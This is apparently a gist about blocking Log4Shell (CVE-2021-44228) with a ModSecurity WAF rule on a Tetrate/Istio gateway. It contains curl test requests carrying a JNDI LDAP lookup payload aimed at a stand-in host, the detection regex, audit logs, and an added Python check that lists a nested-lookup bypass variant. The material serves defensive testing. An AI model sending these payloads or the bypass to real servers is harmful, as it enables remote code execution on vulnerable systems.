@incfly
Last active January 5, 2022 07:58
curl -v -H "Host: httpbin.tetrate.com" -H 'User-Agent: ${JNDI://ldap://evial.xx/path}' \
  --resolve "httpbin.tetrate.com:80:${GATEWAY_IP}" httpbin.tetrate.com/headers
< HTTP/1.1 200 OK
< server: envoy
< date: Tue, 28 Dec 2021 05:48:57 GMT
< content-type: application/json
< content-length: 28
< access-control-allow-origin: *
< access-control-allow-credentials: true
< x-envoy-upstream-service-time: 25
<
{
"origin": "127.0.0.1"
}
kubectl apply -f https://raw.githubusercontent.com/istio/istio/master/samples/httpbin/httpbin.yaml
tctl apply -f ./ingress.yaml
kubectl apply -f ./waf.yaml
apiVersion: security.tsb.tetrate.io/v2
kind: Group
metadata:
  name: t1
  workspace: w1
  tenant: mycompany
  organization: myorg
spec:
  namespaceSelector:
    names:
      - "*/default"
  configMode: BRIDGED
---
apiVersion: security.tsb.tetrate.io/v2
kind: SecuritySetting
metadata:
  name: defaults
  group: t1
  workspace: w1
  tenant: mycompany
  organization: myorg
spec:
  wafSettings:
    ruleSets:
      - block-log4j
---
apiVersion: security.tsb.tetrate.io/v2
kind: WafRuleset
metadata:
  name: block-log4j
  organization: myorg
spec:
  displayName: "Block Log4j Shell Attack"
  description: "Block traffic containing the special substring that can lead to remote code execution."
  # phase:4 is the response-body phase: the request is forwarded upstream before the rule runs
  # (the 403 below still carries x-envoy-upstream-service-time), so a vulnerable backend has
  # already logged the header. Inspect request headers in phase:1 (or phase:2) to block inline.
  # The @rx operator is case-sensitive as written; the test above sends ${JNDI:, which this
  # pattern only catches with a t:lowercase transformation.
  ruleSet: |
    SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML://*|XML://@* \
      "@rx \${jndi:" \
      "phase:4,id:9455,deny,status:403,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'"
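The rule above is a literal, case-sensitive substring match, so it is worth checking offline what it does and does not catch before relying on it at the gateway. The following is an added example, not code from this gist or from Tetrate/ModSecurity: it applies the rule's regex with Python's `re` (an approximation of libmodsecurity's PCRE engine) to a handful of constructed requests, once exactly as written, once with ModSecurity's `t:lowercase` transformation applied, and once with a broader pattern that also flags the nested-lookup obfuscation (`${${lower:j}ndi:...}`) that the literal pattern misses. The sample requests and the hardened pattern are constructed here for illustration.

```python
"""Offline check of the block-log4j SecRule against constructed requests.

Added example; not part of the original gist or of TSB/ModSecurity. Variable
selection is approximated: for a header-only request the rule's REQUEST_LINE
and REQUEST_HEADERS targets amount to the request line plus every header value.
"""
import re

# Pattern exactly as written in the WafRuleset: "@rx \${jndi:" (case-sensitive).
RULE_AS_WRITTEN = re.compile(r"\$\{jndi:")

# Broader pattern (constructed for this example): any "${" that starts a jndi
# lookup, case-insensitively, or that immediately nests another "${" lookup,
# which is how ${${lower:j}ndi:...} style payloads hide the keyword. Still not
# exhaustive; shown only to make the weakness of the literal match visible.
RULE_HARDENED = re.compile(r"(?i)\$\{\s*(?:jndi\s*:|\$\{)")

# Constructed requests: (label, request line, headers).
SAMPLES = [
    ("benign", "GET /headers HTTP/1.1",
     {"Host": "httpbin.tetrate.com", "User-Agent": "curl/7.79.1"}),
    # The payload sent by the curl command in the gist (uppercase JNDI).
    ("gist-curl-payload", "GET /headers HTTP/1.1",
     {"Host": "httpbin.tetrate.com", "User-Agent": "${JNDI://ldap://evial.xx/path}"}),
    ("lowercase-jndi", "GET /headers HTTP/1.1",
     {"User-Agent": "${jndi:ldap://evial.xx/path}"}),
    ("in-request-line", "GET /headers?q=${jndi:dns://evial.xx/x} HTTP/1.1", {}),
    ("nested-lookup-bypass", "GET /headers HTTP/1.1",
     {"X-Api-Version": "${${lower:j}ndi:ldap://evial.xx/path}"}),
]


def targets(request_line, headers):
    """Values the rule inspects: REQUEST_LINE plus each REQUEST_HEADERS value."""
    return [request_line, *headers.values()]


def rule_matches(pattern, request_line, headers, lowercase=False):
    """True if the pattern matches any inspected value; lowercase=True mimics t:lowercase."""
    values = targets(request_line, headers)
    if lowercase:
        values = [v.lower() for v in values]
    return any(pattern.search(v) for v in values)


def evaluate(samples=SAMPLES):
    """Return {label: (blocked_as_written, blocked_with_t_lowercase, blocked_hardened)}."""
    return {
        label: (
            rule_matches(RULE_AS_WRITTEN, line, hdrs),
            rule_matches(RULE_AS_WRITTEN, line, hdrs, lowercase=True),
            rule_matches(RULE_HARDENED, line, hdrs),
        )
        for label, line, hdrs in samples
    }


if __name__ == "__main__":
    print(f"{'sample':<24}{'as-written':<12}{'t:lowercase':<13}hardened")
    for label, result in evaluate().items():
        print(f"{label:<24}" + "".join(f"{str(r):<12} " for r in result))
```

Running the block shows that the rule as written lets the gist's own `${JNDI:` test request through and only catches it once `t:lowercase` is added, and that neither form sees the nested-lookup variant; pair a broader pattern like the one above with the phase change noted in the ruleset comments before treating the gateway as a mitigation.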
curl -v -H "Host: httpbin.tetrate.com" -H 'User-Agent: ${JNDI://ldap://evial.xx/path}' \
  --resolve "httpbin.tetrate.com:80:${GATEWAY_IP}" httpbin.tetrate.com/headers
< HTTP/1.1 403 Forbidden
< date: Tue, 28 Dec 2021 04:42:26 GMT
< server: envoy
< content-length: 0
< x-envoy-upstream-service-time: 29
<
* Connection #0 to host httpbin left intact.
2021-12-28T04:42:26.357217Z error envoy wasm wasm log: [extensions/modsecurity/plugin.cc:563]::doDisruptiveAction()
[audit log][client 10.60.0.16] ModSecurity: Access denied with code 403 (phase 4).
Matched "Operator `Rx' with parameter `jndi' against variable `REQUEST_HEADERS:foo' (Value: `jndi' )
[file "<<reference missing or not informed>>"] [line "9"] [id "9455"] [rev ""]
[msg "Potential Remote Command Execution: Log4j CVE-2021-44228"]
[data ""] [severity "0"] [ver ""] [maturity "0"] [accuracy "0"] [hostname "10.60.2.158"]
[uri "/ip"] [unique_id "1640666546"] [ref "o0,4v90,4"]
apiVersion: gateway.tsb.tetrate.io/v2
kind: IngressGateway
metadata:
  organization: tetrate
  name: httpbin-gw-ingress
  group: httpbin-gw
  workspace: httpbin-ws
  tenant: tetrate
spec:
  workloadSelector:
    namespace: default
    labels:
      app: tsb-gateway-httpbin
  http:
    - name: httpbin
      port: 8000
      hostname: "httpbin.tetrate.com"
      routing:
        rules:
          - route:
              host: "default/httpbin.default.svc.cluster.local"